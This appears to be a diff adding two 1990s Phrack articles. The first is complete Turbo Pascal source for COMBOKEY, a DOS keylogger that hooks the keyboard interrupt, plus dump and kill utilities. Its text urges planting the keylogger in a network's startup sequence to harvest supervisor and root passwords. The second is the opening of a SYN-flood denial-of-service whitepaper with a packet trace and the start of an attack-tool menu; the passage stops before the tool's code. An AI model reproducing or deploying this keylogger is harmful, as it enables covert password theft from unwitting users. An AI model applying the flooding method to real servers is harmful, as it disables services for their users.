+
+
+ENTER COMBOKEY (That'd be the key recorder)
+I differ with my strategy from Dcypher in that I don't bother going
+directly to the keybard hardware.  COMBOKEY just goes ahead and calls
+the old ISR and then looks in the BIOS keyboard buffer to see what the
+key was. Yeah, you don't get the funky-ass key combinations like
+control-shift-right-alt-F2-Z, but hey, I'm just after the passwords.
+
+When a new key is pressed, it's dumped in the buffer.  When the buffer
+is full, nothing happens.  I'll leave writing it to a file as an
+exercise to the reader.
+
+My favorite feature, if I may say so myself, is the fact that COMBOKEY
+has an API in it, sort of.  Interrupt 255 is also latched and provides
+the "user" an interface to the presently running copy of COMBOKEY.  But
+not just anyone can go poking into 255 to kill COMBOKEY or get a buffer
+dump or whatever.  First, you gotta send a combination.
+
+Look at the "const" section of COMBOKEY and you'll see a constant array
+of four bytes.  Change these numbers to whatever the hell you want.  To
+use the COMBOKEY interface you need to send each of these bytes
+sequentially in AX to ISR 255.  Look at the "DoCombo" procedure in Dump
+or Kill to see what I mean.
+
+After you send the combo, you send one more byte that represents the
+command.
+
+Dump buffer:   AX=C0h    Dumps the buffer to a chunk of memory at ES:DI.
+Get info:      AX=C2h    Sends a TinfoRec (see source) to ES:DI.
+Kill:          AX=C1h    Deactivates the recorder.
+
+There are two additional programs following: Dump and Kill.  These just
+use the interface to do their appropriate actions.
+
+THE PROPER ETIQUETTE OF COMBOKEY
+There's a good deal of social engineering involved with using COMBOKEY.
+Since it works on only the machine you put it on, you have to know where
+to put it in the first place to be most effective.  (Or be really
+resourceful and put it on every machine around.)
+
+To maximize your amusement, get the supervisor password first, and then
+put this program in the startup sequence of the network.  Then go nuts.
+
+This program gets REALLY fun when your net is equipped with TCP/IP apps
+like Telnet, and some moron has their home machine hooked up to the
+Net, and they actually log into it  with root from your net.  Instant
+party.
+
+NEAT TRICKS TO TRY
+If I ever get around to it, it'd be cool to use the IPX interface to
+actually broadcast the keystrokes over to a waiting machine for instant
+feedback.
+
+The next trick to try is to maybe build a hardware version of this with
+a little microcontroller.  A Motorola 68HC11 would do nicely.  This
+would get rid of the pesky problem of reseting the machine or turning
+the power off.
+
+Ah well.  Comments and the like to jsrs@cyberspace.com.  Happy hunting.
+
+-------------------------------------------------------------------------------
+{ Source notes:
+  This'll compile on TurboPascal 6 or better.  Might even work with 5.
+  Why Turbo?  Cause it generates damn tight code, and it's much more readable
+  for the newbies than all assembly. }
+
+{ComboKey - It's a TSR, so we gotta do the mem setup. }
+{$M 1024, 0, 2100}
+program ComboKey;
+
+uses Dos; { For Keep() }
+
+const
+     DUMP_BUFFER = $C0;
+     KILL_RECORDER = $C1;
+     GET_INFO = $C2;
+
+     BUFSIZE = 2048;     { In bytes, NOT paragraphs! }
+     DISPLAY_MAX = 100;
+     combo: Array[0..3] of Byte = ( 01, 01, 19, 74 );
+
+type
+     PBuf = ^TBuf;
+     TBuf = Array[0..BUFSIZE-1] of Byte;
+     PInfoRec = ^TInfoRec;
+     TInfoRec = record
+          buffer_size: Word;  { Word is 16 bit, unsigned }
+          overwrite: Word;
+          buffer_ptr: Word;
+     end;
+
+var
+     old9o, old9s: Word; { Must be in this order! }
+     wptr: Word absolute $40:$1c; { Ptr to next avail slot in kbd buffer }
+     q_top: Word absolute $40:$80;
+     q_bot: Word absolute $40:$82;
+     buffer: PBuf;
+     buf_ptr: Word;
+     overwrite_ctr: Word;
+     last_wptr: Word;
+     tumbler: Byte; { How many numbers in the combo right so far? }
+
+procedure SetVector( int: Byte; s, o: Word);
+     begin
+          asm
+               push ds
+               cli
+               mov  ah, 25h
+               mov  al, int
+               mov  ds, s
+               mov  dx, o
+               int  21h
+               sti
+               pop  ds
+          end;
+     end;
+
+procedure NewInt09(Flags, CS, IP, AX, BX, CX, DX, SI, DI, DS, ES, BP: Word);
+interrupt;
+     var
+          offset: Word;
+          c: Byte;
+          l: Word;
+          ctr: Word;
+     begin
+          { First call the old handler.  Do the pushf,  cause this is an
+            interrupt handler. }
+          asm
+               pushf
+               call dword ptr [old9o]   { Since old9s is next, it works }
+               cli
+          end;
+
+          { This isn't a press, but a release - ignore it. }
+          if last_wptr = wptr then Exit;
+
+          last_wptr:=wptr;
+
+          { Did the queue just wrap? }
+          if (wptr = q_top) then offset:=q_bot-2
+          else offset:=wptr-2;
+
+          Inc(buf_ptr);
+          if (buf_ptr = BUFSIZE) then begin { we'd write it, but oh well. }
+               buf_ptr:=0;
+               Inc(overwrite_ctr);
+          end;
+
+          buffer^[buf_ptr]:=Mem[$40:offset];
+
+          asm
+               sti
+          end;
+     end;
+
+{ Here's the interface system.  Don't bother saving the old $FF,
+cause who uses it anyway?! }
+procedure NewIntFF(Flags, CS, IP, AX, BX, CX, DX, SI, DI, DS, ES, BP: Word);
+interrupt;
+     var
+          command: Word;
+          res, rdi: Word;
+          infoptr: PInfoRec;
+          l: Word;
+     begin
+          command:=AX;
+          res:=ES;
+          rdi:=DI;
+
+          if tumbler=4 then begin  { we have a winner... }
+          tumbler:=0;
+               asm
+                    sti
+               end;
+
+               case command of
+                    DUMP_BUFFER: begin
+                         asm
+                                   push ds
+                              mov  cx, BUFSIZE
+                              mov  es, [res]
+                              mov  di, [rdi]
+                              mov  ax, [WORD PTR buffer+2]
+                              mov  ds, ax
+                              mov  ax, [WORD PTR buffer]
+                              mov  si, ax
+
+                              cld
+                              rep  movsb
+                              pop  ds
+                         end;
+                    end;
+
+                    KILL_RECORDER: begin
+                         SetVector(9, old9s, old9o);
+                    end;
+
+                    GET_INFO: begin
+                         asm
+                              mov  es, [res]
+                              mov  di, [rdi]
+                              mov  ax, BUFSIZE
+                              mov  es:[di], ax
+                              mov  ax, [overwrite_ctr]
+                              mov  es:[di+2], ax
+                              mov  ax, [buf_ptr]
+                              mov  es:[di+4], ax
+                         end;
+                    end;
+               end;
+
+               asm
+                    cli
+               end;
+          end;
+
+          if command=combo[tumbler] then Inc(tumbler)
+          else tumbler:=0;
+     end;
+
+begin
+     asm
+          mov  ah, $35
+          mov  al, 9
+          int  $21
+
+          mov  ax, es
+          mov  old9s, ax
+          mov  old9o, bx
+     end;
+
+     SetVector(9, Seg(NewInt09), Ofs(NewInt09));
+     SetVector(255, Seg(NewIntFF), Ofs(NewIntFF));
+
+     buffer:=New(PBuf);
+     buf_ptr:=0;
+     overwrite_ctr:=0;
+     last_wptr:=0;
+     tumbler:=0;
+
+     Keep(0);
+end.
+
+
+
+-------------------------------------------------------------------------------
+
+{ Kills the keyrecorder }
+program Kill;
+
+const
+     combo0 = 01;
+     combo1 = 01;
+     combo2 = 19;
+     combo3 = 74;
+
+     KILL_RECORDER = $C1;
+
+procedure ResetCombo;
+     var
+     l: Word;
+   begin
+     for l:=1 to 4 do asm
+          mov  ax, 0
+         int   $ff
+      end;
+   end;
+
+procedure DoCombo;
+     begin
+          asm
+               mov  ax, combo0
+               int  $ff
+               mov  ax, combo1
+               int  $ff
+               mov  ax, combo2
+               int  $ff
+               mov  ax, combo3
+               int  $ff
+          end;
+     end;
+
+begin
+     ResetCombo;
+     DoCombo;
+     asm
+          mov  ax, KILL_RECORDER
+          int  $ff
+     end;
+end.
+
+
+-------------------------------------------------------------------------------
+
+{ Syntax:
+     DUMP DESTFILE.FIL
+
+  This'll dump the buffer information and contents to the file.  If 
+  no file is given, it goes to the screen. }
+
+program Dump;
+
+const
+     combo0 = 01;
+     combo1 = 01;
+     combo2 = 19;
+     combo3 = 74;
+
+     DUMP_BUFFER = $C0;
+     GET_INFO = $C2;
+
+type
+     PInfoRec = ^TInfoRec;
+     TInfoRec = record
+          buffer_size: Word;
+          overwrite: Word;
+          buffer_ptr: Word;
+     end;
+
+var
+     info: TInfoRec;
+     buffer: Array[0..8191] of Byte;
+     l: Word;
+     f: Text;
+
+procedure ResetCombo;
+     var
+          l: Word;
+     begin
+          for l:=1 to 4 do asm
+               mov  ax, 0
+               int  $ff
+          end;
+     end;
+
+procedure DoCombo;
+     begin
+          asm
+               mov  ax, combo0
+               int  $ff
+               mov  ax, combo1
+               int  $ff
+               mov  ax, combo2
+               int  $ff
+               mov  ax, combo3
+               int  $ff
+          end;
+     end;
+
+begin
+   Assign(f, ParamStr(1));
+   Rewrite(f);
+
+   ResetCombo;
+
+     DoCombo;
+     asm
+          mov  ax, SEG info
+          mov  es, ax
+          mov  di, OFFSET info
+          mov  ax, GET_INFO
+          int  $ff
+     end;
+
+     writeln(f,'Buffer size: ',info.buffer_size);
+     writeln(f,'Buffer ptr:  ',info.buffer_ptr);
+     writeln(f,'Overwrite:   ',info.overwrite);
+
+     DoCombo;
+     asm
+          mov  ax, SEG buffer
+          mov  es, ax
+          mov  di, OFFSET buffer
+          mov  ax, DUMP_BUFFER
+          int  $ff
+     end;
+
+     for l:=0 to info.buffer_ptr do begin
+          write(f, Char(buffer[l]));
+          if buffer[l] = 13 then write(f,#10);
+     end;
+     
+     Close(f);
+end.
+
diff --git a/phrack48/13.txt b/phrack48/13.txt
new file mode 100644
index 0000000..da285a1
--- /dev/null
+++ b/phrack48/13.txt
@@ -0,0 +1,1364 @@
+                            ==Phrack Magazine==
+
+             Volume Seven, Issue Forty-Eight, File 13 of 18
+
+
+			     [ Project Neptune ]
+
+			by daemon9 / route / infinity
+			     for Phrack Magazine
+		      July 1996 Guild Productions, kid
+
+		       comments to route@infonexus.com
+
+
+	This project is a comprehensive analysis of TCP SYN flooding.  You 
+may be wondering, why such a copious treatment of TCP SYN flooding?  
+Apparently, someone had to do it.  That someone turned out to be me (I need
+a real hobby).  The SYNflood Project consists of this whitepaper, including 
+anotated network monitor dumps and fully functional robust Linux sourcecode.
+
+
+		--[ Introduction ]--
+
+
+	TCP SYN flooding is a denial of service (DOS) attack.  Like most DOS
+attacks, it does not exploit a software bug, but rather a shortcoming in the
+implemenation of a particular protocol.  For example, mail bombing DOS attacks
+work because most SMTP agents are dumb and will accept whatever is sent their 
+way.  ICMP_ECHO floods exploit the fact that most kernels will simply reply to
+ICMP_ECHO request packets one after another, ad inifintum.  We will see that
+TCP SYN flood DOS attacks work because of the current implementation of TCP's
+connection establishment protocol.
+
+
+		--[ Overview  ]--
+
+
+	This whitepaper is intended as a complete introduction to TCP SYN 
+flooding (refered to hereafter as SYN flooding).  It will cover the attack
+in detail, including all relevant necessary background information.  It is 
+organized into sections:
+
+	Section I.	TCP Background Information
+	Section II.	TCP Memory Structures and the Backlog
+	Section III.	TCP Input Processing
+	Section IV.	The Attack
+	Section V.	Network Trace
+	Section VI.	Neptune.c
+	Section VII.	Discussion and Prevention
+	Section VIII.	References
+
+(Note that readers unfamiliar with the TCP/IP protocol suite may wish to first
+read ftp://ftp.infonexus.com/pub/Philes/NetTech/TCP-IP/tcipIp.intro.txt.gz)
+
+
+         	--[ The Players ]--
+
+
+                A:      Target host
+                X:      Unreachable host 
+                Z:      Attacking host
+	     Z(x):	Attacker masquerading as the unreachable
+
+
+                --[ The Figures ]--
+                
+
+                There are a few network transaction  figures in the paper and
+they are to be interpreted as per the following example:
+
+       tick   host a      control     host b
+
+tick:   
+	A unit of time.  There is no distinction made as to *how* much time 
+passes between ticks, just that time passes.  It's generally not going to be
+a great deal. 
+host a: 
+	A machine particpating in a TCP-based conversation.
+control: 
+	This field shows any relevant control bits set in the TCP header and 
+the direction the data is flowing
+host b: 
+	A machine particpating in a TCP-based conversation.
+
+For example:
+
+        1       A       ---SYN--->      B       
+
+	In this case, at the first refrenced point in time, host a is sending
+a TCP segment to host b with the SYN bit on.  Unless stated, we are generally 
+not concerned with the data portion of the TCP segment.
+
+
+
+		Section I.	TCP Background Information
+
+
+
+	TCP is a connection-oriented, reliable transport protocol.  TCP is
+responsible for hiding network intricacies from the upper layers.  A 
+connection-oriented protcol implies that the two hosts participating in a 
+discussion must first establish a connection before data may be exchanged.  In
+TCP's case, this is done with the three-way handshake.  Reliability can be 
+provided in a number of ways, but the only two we are concerned with are data 
+sequencing and acknowledgement.  TCP assigns sequence numbers to every byte in
+every segment and acknowledges all data bytes recieved from the other end.  
+(ACK's consume a sequence number, but are not themselves ACK'd.  That would be
+ludicris.)  
+
+
+                --[ TCP Connection Establishment ]--
+
+
+ 	In order to exchange data using TCP, hosts must establish a connection.
+TCP establishes a connection in a 3 step process called the 3-way handshake.
+If machine A is running a client program and wishes to conect to a server
+program on machine B, the process is as follows:
+
+                        fig(1)
+       
+        1       A       ---SYN--->      B       
+
+        2       A    <---SYN/ACK---     B
+
+        3       A       ---ACK--->      B
+
+                                
+	At (1) the client is telling the server that it wants a connection.
+This is the SYN flag's only purpose.  The client is telling the server that 
+the sequence number field is valid, and should be checked.  The client will 
+set the sequence number field in the TCP header to it's ISN (initial sequence
+number).  The server, upon receiving this segment (2) will respond with it's 
+own ISN (therefore the SYN flag is on) and an ACKnowledgement of the clients 
+first segment (which is the client's ISN+1).  The client then ACK's the 
+server's ISN (3).  Now data transfer may take place.
+
+ 
+              --[ TCP Control Flags  ]--
+
+
+	There are six TCP control flags.  We are only concerned with 3, but 
+the others are included for posterity:
+
+*SYN:	Synchronize Sequence Numbers
+	The synchronize sequence numbers field is valid.  This flag is only 
+valid during the 3-way handshake.  It tells the receiving TCP to check the 
+sequence number field, and note it's value as the connection-initiator's 
+(usually the client) initial sequence number.  TCP sequence numbers can 
+simply be thought of as 32-bit counters.  They range from 0 to 4,294,967,295.
+Every byte of data exchanged across a TCP connection (along with certain 
+flags) is sequenced.  The sequence number field in the TCP header will contain
+the sequence number of the *first* byte of data in the TCP segment.  
+
+*ACK:	Acknowledgement
+	The acknowledgement number field is valid.  This flag is almost always
+set.   The acknowledgement number field in the TCP header holds the value of 
+the next *expected* sequence number (from the other side), and also 
+acknowledges *all* data (from the other side) up through this ACK number minus
+one.
+
+*RST:	Reset
+	Destroy the referenced connection.  All memory structures are torn 
+down.
+
+URG:	Urgent 
+	The urgent pointer is valid.  This is TCP's way of implementing out
+of band (OOB) data.  For instance, in a telnet connection a `ctrl-c` on the 
+client side is considered urgent and will cause this flag to be set. 
+
+PSH:	Push
+	The receiving TCP should not queue this data, but rather pass it to 
+the application as soon as possible.  This flag should always be set in 
+interactive connections, such as telnet and rlogin.
+
+FIN:	Finish 
+	The sending TCP is finished transmitting data, but is still open to 
+accepting data.
+
+
+                --[ Ports ]--
+                
+	
+	To grant simultaneous access to the TCP module, TCP provides a user 
+interface called a port.  Ports are used by the kernel to identify network 
+processes.  They are strictly transport layer entities.  Together with an 
+IP address, a TCP port provides provides an endpoint for network 
+communications.  In fact, at any given moment *all* Internet connections can 
+be described by 4 numbers: the source IP address and source port and the 
+destination IP address and destination port.  Servers are bound to 
+'well-known' ports so that they may be located on a standard port on 
+different systems.  For example, the telnet daemon sits on TCP port 23.
+	
+
+
+		Section II.	TCP Memory Structures and the Backlog
+
+		
+
+	For a copius treatment of the topic of SYN flooding, it is necessary
+to look at the memory structures that TCP creates when a client SYN arrives
+and the connection is pending (that is, a connection that is somewhere in 
+the process of the three-way handshake and TCP is in the SYN_SENT or 
+SYN_RVCD state).
+
+
+		--[ BSD ]--		
+
+
+	Under BSD style network code, for any given pending TCP connection 
+there are three memory structures that are allocated (we do not discuss the 
+process (proc) structure and file structure, but the reader should be aware 
+that they exist as well.):
+
+Socket Structure (socket{}): 	
+	Holds the information related to the local end of the communications 
+link: protocol used, state information, addressing information, connection 
+queues, buffers, and flags.
+
+Internet Protocol Control Block Structure (inpcb{}):
+	PCB's are used at the transport layer by TCP (and UDP) to hold various
+pieces of information needed by TCP.  They hold: TCP state information, IP 
+address information, port numbers, IP header prototype and options and a 
+pointer to the routing table entry for the destination address.  PCB's are 
+created for a given TCP based server when the server calls listen(),
+
+TCP Control Block Structure (tcpcb{}):
+	The TCP control block contains TCP specific information such as timer
+information, sequence number information, flow control status, and OOB data.
+
+
+		--[ Linux ]--
+
+
+	Linux uses a different scheme of memory allocation to hold network
+information.  The socket structure is still used, but instead of the pcb{} 
+and tcpcb{}, we have:
+
+Sock Structure (sock{}):
+	Protocol specific information, most of the data structures are TCP
+related.  This is a huge structure.
+
+SK Structure (sk_buff{}):
+	Holds more protocol specific information including packet header 
+information, also contains a sock{}.
+
+According to Alan Cox:
+	The inode is the inode holding the socket (this may be a dummy inode 
+for non file system sockets like IP), the socket holds generic high level
+methods and the struct sock is the protocol specific object, although all but 
+a few experimental high performance items use the same generic struct sock and
+support code. That holds chains of linear buffers (struct sk_buff's).
+
+[ struct inode -> struct socket -> struct sock -> chains of sk_buff's ]
+
+
+		--[ The Backlog Queue]--
+
+	
+	These are large memory structures.  Every time a client SYN arrives
+on a valid port (a port where a TCP server is listen()ing), they must be 
+allocated.  If there were no limit, a busy host could easily exhuast all of
+it's memory just trying to process TCP connections.  (This would be an even
+simpler DOS attack.)  However, there is an upper limit to amount of 
+concurrent connection requests a given TCP can have outstanding for a 
+given socket.  This limit is the backlog and it is the length of the queue
+where incoming (as yet incomplete) connections are kept.  This queue limit 
+applies to both the number of imcomplete connections (the 3-way handshake has
+not been completed) and the number of completed connections that have not 
+been pulled from the queue by the application by way of the accept() call.
+If this backlog limit is reached, we will see that TCP will silently 
+discard all incoming connection requests until the pending connections can 
+be dealt with.  
+	The backlog is not a large value.  It does not have to be.  Normally
+TCP is quite expedient in connection establishment processing.  Even if a
+connection arrived while the queue was full, in all likelyhood, when the
+client retransmits it's connection request segment, the receiving TCP will
+have room again in it's queue.  Different TCP implementations have different
+backlog sizes.   Under BSD style networking code, there is also 'grace' margin 
+of 3/2.  That is, TCP will allow up to backlog*3/2+1 connections.  This will
+allow a socket one connection even if it calls listen with a backlog of 0.  
+Some common backlog values:
+                        fig(2)
+
+   OS		Backlog	  BL+Grace  Notes	
+---------------------------------------------------------------------------
+SunOS 4.x.x:	 5    	     8 
+IRIX 5.2:	 5	     8
+Solaris
+Linux 1.2.x: 	10	    10   Linux does not have this grace margin.
+FreeBSD 2.1.0:  	    32
+FreeBSD 2.1.5:		   128
+Win NTs 3.5.1:	 6	     6   NT does not appear to have this margin.
+Win NTw 4.0:	 6	     6   NT has a pathetic backlog.
+
+
+
+		Section III.	TCP Input Processing
+
+
+	
+	To see exactly where the attack works it is necessary to watch as 
+the receiving TCP processes an incoming segment.  The following is true for
+BSD style networking, and only processes relevant to this paper are 
+discussed.
+
+A packet arrives and is demultiplexed up the protocol stack to TCP.  The TCP
+state is LISTEN:
+
+Get header information:
+	TCP retrieves the TCP and IP headers and stores the information in
+memory.
+Verify the TCP checksum:
+	The standard Internet checksum is applied to the segment.  If it 
+fails, no ACK is sent, and the segment is dropped, assuming the client will
+retranmit it.
+Locate the PCB{}:
+	TCP locates the pcb{} associated with the connection.  If it is not
+found, TCP drops the segment and sends a RST.  (Aside: This is how TCP
+handles connections that arrive on ports with no server listen()ing.)  If
+the PCB{} exists, but the state is CLOSED, the server has not called 
+connect() or listen().  The segment is dropped, but no RST is sent.  The
+client is expected to retransmit it's connection request.  We will see this
+occurence when we discuss the 'Linux Anomaly'.
+Create new socket:
+	When a segment arrives for a listen()ing socket, a slave socket is
+created.  This is where a socket{}, tcpcb{}, and another pcb{} are created.
+TCP is not committed to the connection at this point, so a flag is set to
+cause TCP to drop the socket (and destroy the memory structures) if an
+error is encountered.  If the backlog limit is reached, TCP considers this 
+an error, and the connection is refused.  We will see that this is exactly 
+why the attack works.	Otherwise, the new socket's TCP state is LISTEN, and
+the completion of the passive open is attempted.
+Drop if RST, ACK, or no SYN:
+	If the segment contains a RST, it is dropped.  If it contains an
+ACK, it is dropped, a RST is sent and the memory structures torn down (the
+ACK makes no sense for the connection at this point, and is considered an
+error).  If the segment does not have the SYN bit on, it is dropped.  If
+the segment contains a SYN, processing continues.
+Address processing, etc:
+	TCP then gets the clients address information into a buffer and 
+connects it's pcb{} to the client, processes any TCP options, and 
+initializes it's initial send sequence (ISS) number.
+ACK the SYN:
+	TCP sends a SYN, ISS and an ACK to the client.  The connection
+establishment timer is set for 75 seconds at this point. The state changes 
+to SYN_RCVD.  Now. TCP is commited to the socket.  We will see that this 
+is state the target TCP will be in when in the throes of the attack because
+the expected client response is never received.  The state remains SYN_RCVD
+until the connection establishment timer expires, in which case the all the 
+memory structures associated with the connection are destroyed, and the
+socket returns to the LISTEN state.
+
+		
+
+		Section IV.	The Attack
+
+
+	
+	A TCP connection is initiated with a client issuing a request to a 
+server with the SYN flag on in the TCP header.  Normally the server will 
+issue a SYN/ACK back to the client identified by the 32-bit source address in 
+the IP header.  The client will then send an ACK to the server (as we 
+saw in figure 1 above) and data transfer can commence.  When the client IP 
+address is spoofed to be that of an unreachable, host, however, the targetted
+TCP cannot complete the 3-way handshake and will keep trying until it times 
+out.  That is the basis for the attack.
+	The attacking host sends a few (we saw that as little as 6 is 
+enough) SYN requests to the target TCP port (for example, the telnet daemon).
+The attacking host also must make sure that the source IP-address is spoofed 
+to be that of another, currently unreachable host (the target TCP will be 
+sending it's response to this address).  IP (by way of ICMP) will inform TCP 
+that the host is unreachable, but TCP considers these errors to be transient 
+and leaves the resolution of them up to IP (reroute the packets, etc) 
+effectively ignoring them.  The IP-address must be unreachable because the 
+attacker does not want *any* host to recieve the SYN/ACKs that will be coming 
+from the target TCP, which  would elicit a RST from that host (as we saw in
+TCP input above).  This would foil the attack.  The process is as follows:
+
+			fig(3)
+
+	1	Z(x)    ---SYN--->	A
+
+		Z(x)    ---SYN--->	A
+
+		Z(x)    ---SYN--->	A
+
+		Z(x)    ---SYN--->	A
+
+		Z(x)    ---SYN--->	A
+
+		Z(x)    ---SYN--->	A
+
+
+	2	X    <---SYN/ACK--- 	A
+
+		X    <---SYN/ACK---	A
+
+			...
+
+	3	X      <---RST---	A
+
+
+At (1) the attacking host sends a multitude of SYN requests to the target 
+to fill it's backlog queue with pending connections.  (2) The target responds
+with SYN/ACKs to what it believes is the source of the incoming SYNs.  During
+this time all further requests to this TCP port will be ignored.  The target
+port is flooded.
+
+
+		--[ Linux Anomaly ]--
+
+
+	In doing my research for this project, I noticed a very strange
+implementation error in the TCP module of Linux.   When a particular TCP 
+server is flooded on a Linux host, strange things are afoot...  First, it 
+appears that the connection-establishment timer is broken.  The 10 spoofed 
+connection-requests keep the sockets in the SYN_RCVD state for just 
+over 20 minutes (23 minutesto be exact.  Wonder what the signifigance of 
+this is... Hmmm...).  Much longer than the 75-seconds it *should* be.  The 
+next oddity is even more odd... After that seemingly arbitrary time period
+(I have to determine what the hell is going on there), TCP moves the flooded
+sockets into the CLOSE state, where they *stay* until a connection-request
+arrives on a *different* port.  If a connection-request arrives on the 
+flooded port (now in the CLOSE state), it will not answer, acting as if it
+is still flooded.  After the connection-request arrives on a different port,
+the CLOSEd sockets will be destroyed, and the original flooded port will be
+free to answer requests again.  It seems as though the connection-request
+will spark the CLOSEd sockets into calling listen()...  Damn wierd if you ask
+me...
+ 	The implications of this are severe.  I have been able to completely
+disable all TCP based servers from answering requests indefinitely.  If all
+the TCP servers are flooded, there are none to recieve the valid connection
+request to alleviate the CLOSE state from the flooded connections.  Bad 
+news indeed. 
+	[Note: as of 7.15.96 this is a conundrum.  I have contacted Alan
+Cox and Eric Schenk and plan to work with them on a solution to this 
+problem.  I be forthcoming with all our findings as soon as possible.  I 
+believe the problem to perhaps lie (at least in part) in the 
+tcp_close_pending() function...  Or perhaps there is a logic error in how
+TCP switches between the connection-establishment timer and the 
+keep-alive timer.  They are both implemented using the same variable since
+they are mutally exclusive...]
+
+
+	
+
+		Section V.	Network Trace
+
+	
+
+	The following is a network trace from an actual SYN flooding session.
+The target machine is Ash, a Linux 1.2.13 box.  The attacker is Onyx.  The
+network is a 10Mbps ethernet.
+
+Network Monitor trace  Fri 07/12/96 10:23:34  Flood1.TXT
+
+Frame   Time    Src MAC Addr   Dst MAC Addr   Protocol     Description                                                       Src Other Addr  Dst Other Addr  Type Other Addr
+
+1       2.519   onyx           ash            TCP/23       ....S., len:    4, seq:3580643269, ack:1380647758, win:  512, src 192.168.2.2     192.168.2.7     IP
+2       2.520   ash            onyx           TCP/1510     .A..S., len:    4, seq: 659642873, ack:3580643270, win:14335, src 192.168.2.7     192.168.2.2     IP
+3       2.520   onyx           ash            TCP/23       .A...., len:    0, seq:3580643270, ack: 659642874, win:14260, src 192.168.2.2     192.168.2.7     IP
+
+	A telnet client is started on Onyx, and we see the standard 3-way 
+	handshake between the two hosts for the telnet session.
+
+Lines 4-126 were interactive telnet traffic and added nothing to the 
+discussion.
+
+127     12.804  ash            onyx           TCP/1510     .A...F, len:    0, seq: 659643408, ack:3580643401, win:14335, src 192.168.2.7     192.168.2.2     IP
+128     12.804  onyx           ash            TCP/23       .A...., len:    0, seq:3580643401, ack: 659643409, win:14322, src 192.168.2.2     192.168.2.7     IP
+129     12.805  onyx           ash            TCP/23       .A...F, len:    0, seq:3580643401, ack: 659643409, win:14335, src 192.168.2.2     192.168.2.7     IP
+130     12.805  ash            onyx           TCP/1510     .A...., len:    0, seq: 659643409, ack:3580643402, win:14334, src 192.168.2.7     192.168.2.2     IP
+
+	Here we see the 4-way connection termination procedure.
+
+	At this point, the flood program is started on onyx, the information
+	filled in, and the attack is launched. 
+	
+131     42.251  onyx           *BROADCAST     ARP_RARP  ARP: Request, Target IP: 192.168.2.7                                                               
+
+	Onyx is attempting to get ash's ethernet address using ARP.  
+	
+132     42.251  ash            onyx           ARP_RARP  ARP: Reply, Target IP: 192.168.2.2 Target Hdwr Addr: 0020AF2311D7                                  
+
+	Ash responds with it's ethernet address.
+
+133     42.252  onyx           ash            TCP/23       ....S., len:    0, seq:3364942082, ack:         0, win:  242, src 192.168.2.10    192.168.2.7     IP
+
+	The flood begins.  Onyx sends the first of 10 TCP segments with the
+	SYN bit on, and the IP address spoofed to the telnet daemon.
+
+134     42.252  ash            *BROADCAST     ARP_RARP  ARP: Request, Target IP: 192.168.2.10                                                              
+
+	Ash immediately attempts to resolve the ethernet address.  However,
+	since there is no such host on the network (and no router to proxy
+	the request with) the ARP request will not be answered.  The host,
+	is in effect, unreachable.
+
+135     42.271  onyx           ash            TCP/23       ....S., len:    0, seq:3381719298, ack:         0, win:  242, src 192.168.2.10    192.168.2.7     IP
+136     42.291  onyx           ash            TCP/23       ....S., len:    0, seq:3398496514, ack:         0, win:  242, src 192.168.2.10    192.168.2.7     IP
+137     42.311  onyx           ash            TCP/23       ....S., len:    0, seq:3415273730, ack:         0, win:  242, src 192.168.2.10    192.168.2.7     IP
+138     42.331  onyx           ash            TCP/23       ....S., len:    0, seq:3432050946, ack:         0, win:  242, src 192.168.2.10    192.168.2.7     IP
+139     42.351  onyx           ash            TCP/23       ....S., len:    0, seq:3448828162, ack:         0, win:  242, src 192.168.2.10    192.168.2.7     IP
+140     42.371  onyx           ash            TCP/23       ....S., len:    0, seq:3465605378, ack:         0, win:  242, src 192.168.2.10    192.168.2.7     IP
+141     42.391  onyx           ash            TCP/23       ....S., len:    0, seq:3482382594, ack:         0, win:  242, src 192.168.2.10    192.168.2.7     IP
+142     42.411  onyx           ash            TCP/23       ....S., len:    0, seq:3499159810, ack:         0, win:  242, src 192.168.2.10    192.168.2.7     IP
+143     42.431  onyx           ash            TCP/23       ....S., len:    0, seq:3515937026, ack:         0, win:  242, src 192.168.2.10    192.168.2.7     IP
+
+	The next 9 of 10 SYNs.  The telnet daemon on ash is now flooded.
+	At this point, another telnet client is started on Onyx.
+
+144     47.227  onyx           *BROADCAST     ARP_RARP  ARP: Request, Target IP: 192.168.2.7                                                               
+
+	Onyx is again attempting to get ash's ethernet address using ARP.
+	Hmmm, this entry should be in the arp cache.  I should look into 
+	this.  
+
+145     47.228  ash            onyx           ARP_RARP  ARP: Reply, Target IP: 192.168.2.2 Target Hdwr Addr: 0020AF2311D7                                  
+
+	Here is the ARP reply.
+
+146     47.228  onyx           ash            TCP/23       ....S., len:    4, seq:3625358638, ack:         0, win:  512, src 192.168.2.2     192.168.2.7     IP
+147     50.230  onyx           ash            TCP/23       ....S., len:    4, seq:3625358638, ack:         0, win:14335, src 192.168.2.2     192.168.2.7     IP
+148     56.239  onyx           ash            TCP/23       ....S., len:    4, seq:3625358638, ack:         0, win:14335, src 192.168.2.2     192.168.2.7     IP
+
+	Onyx is attempting to establish a connection with the telnet daemon
+	on Ash, which is, as we saw, flooded.
+
+149     67.251  ash            *BROADCAST     ARP_RARP  ARP: Request, Target IP: 192.168.2.10                                                              
+
+	Ash is still trying to get the ethernet address of the spoofed host.
+	In vain...
+
+150     68.247  onyx           ash            TCP/23       ....S., len:    4, seq:3625358638, ack:         0, win:14335, src 192.168.2.2     192.168.2.7     IP
+151     92.254  onyx           ash            TCP/23       ....S., len:    4, seq:3625358638, ack:         0, win:14335, src 192.168.2.2     192.168.2.7     IP
+
+	Onyx is still transmitting it's connection-estabishment requests...
+	Also in vain.
+
+152     92.258  ash            *BROADCAST     ARP_RARP  ARP: Request, Target IP: 192.168.2.10                                                              
+
+	Hello?  Are you out there?
+
+
+
+		Section VI.	Neptune.c
+
+
+	
+	Neptune.c is the companion code.  It does everything we've talked 
+about, and more.  Neptune.c is admittedly more complex than it needs to 
+be.  I included several features that are not essential, but make the 
+program more robust.  The program features: simple to use menuing system, an 
+alternative command line interface for easy integration into scripts, 
+ICMP_ECHO requesting to query if unreachable is in fact unreachable (AKA 
+'ping'ing), infinity mode (read the code) and a daemon mode with (psuedo) 
+random unreachable IP address choosing.
+
+	The menu is really self explanatory...
+
+1		Enter target host
+
+Enter yur target.  If you are confused at this point, kill yurself.
+
+2		Enter source (unreachable) host
+
+Enter the puported sender.  It is integral that this host be routable but not
+reachable.  Remember that the address must be a unicast address.  If it is a
+broadcast or multicast address it will be dropped by the target TCP.
+
+3		Send ICMP_ECHO(s) to unreachable
+
+Make sure that yur puported sender is in fact unreachable.  This is not 100%
+reliable as A) ICMP packets can be dropped by the unreliable network layer, 
+B) the host may filter out ICMP_ECHO packets.
+
